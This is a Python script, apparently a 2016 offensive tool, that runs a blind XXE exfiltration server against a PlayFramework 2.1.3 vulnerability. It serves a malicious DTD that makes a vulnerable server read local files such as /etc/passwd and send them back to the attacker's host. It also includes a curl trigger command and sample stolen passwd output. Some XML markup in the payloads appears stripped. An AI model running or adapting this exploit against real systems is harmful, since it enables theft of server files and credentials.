#!/usr/bin/python # # Simple Blind XXE server intended to handle incoming requests for # malicious DTD file, that will subsequently ask for locally stored file, # like file:///etc/passwd. # # This program has been tested with PlayFramework 2.1.3 XXE vulnerability, # to be run as follows: # # 0. Configure global variables: SERVER_SOCKET and RHOST # # 1. Run the below script, using: # $ python blindxxe.py # # where can be for instance: "file:///etc/passwd" # # 2. Then, while server is running - invoke XXE by requesting e.g. # $ curl -X POST http://vulnerable/app --data-binary \ # $'&exfil;' # # The expected result will be like the following: # # $ python blindxxe.py # Exfiltrated file:///etc/passwd: # ------------------------------ # root:x:0:0:root:/root:/bin/sh # nobody:x:65534:65534:nobody:/nonexistent:/bin/false # user:x:1000:50:Linux User,,,:/home/user:/bin/sh # play:x:100:65534:Linux User,,,:/var/www/play/:/bin/false # mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false # # # Mariusz B., 2016 # from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import urllib import re import sys import time import threading import socket # # CONFIGURE THE BELOW VARIABLES # SERVER_SOCKET = ('', 8000) EXFIL_FILE = 'file:///etc/passwd' # The host on which you will run this server RHOST = '' + str(SERVER_SOCKET[1]) EXFILTRATED_EVENT = threading.Event() class BlindXXEServer(BaseHTTPRequestHandler): def response(self, **data): code = data.get('code', 200) content_type = data.get('content_type', 'text/plain') body = data.get('body', '') self.send_response(code) self.send_header('Content-Type', content_type) self.end_headers() self.wfile.write(body.encode('utf-8')) self.wfile.close() def do_GET(self): self.request_handler(self) def do_POST(self): self.request_handler(self) def log_message(self, format, *args): return def request_handler(self, request): global EXFILTRATED_EVENT path = urllib.unquote(request.path).decode('utf8') m = re.search('\/\?exfil=(.*)', path, re.MULTILINE) if m and request.command.lower() == 'get': data = path[len('/?exfil='):] print 'Exfiltrated %s:' % EXFIL_FILE print '-' * 30 print urllib.unquote(data).decode('utf8') print '-' * 30 + '\n' self.response(body='true') EXFILTRATED_EVENT.set() elif request.path.endswith('.dtd'): #print '[DEBUG] Sending malicious DTD file.' dtd = ''' "> %%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST} self.response(content_type='text/xml', body=dtd) else: #print '[INFO] %s %s' % (request.command, request.path) self.response(body='false') def main(): server = HTTPServer(SERVER_SOCKET, BlindXXEServer) thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() while not EXFILTRATED_EVENT.is_set(): pass if __name__ == '__main__': if len(sys.argv) > 1: EXFIL_FILE = sys.argv[1] main()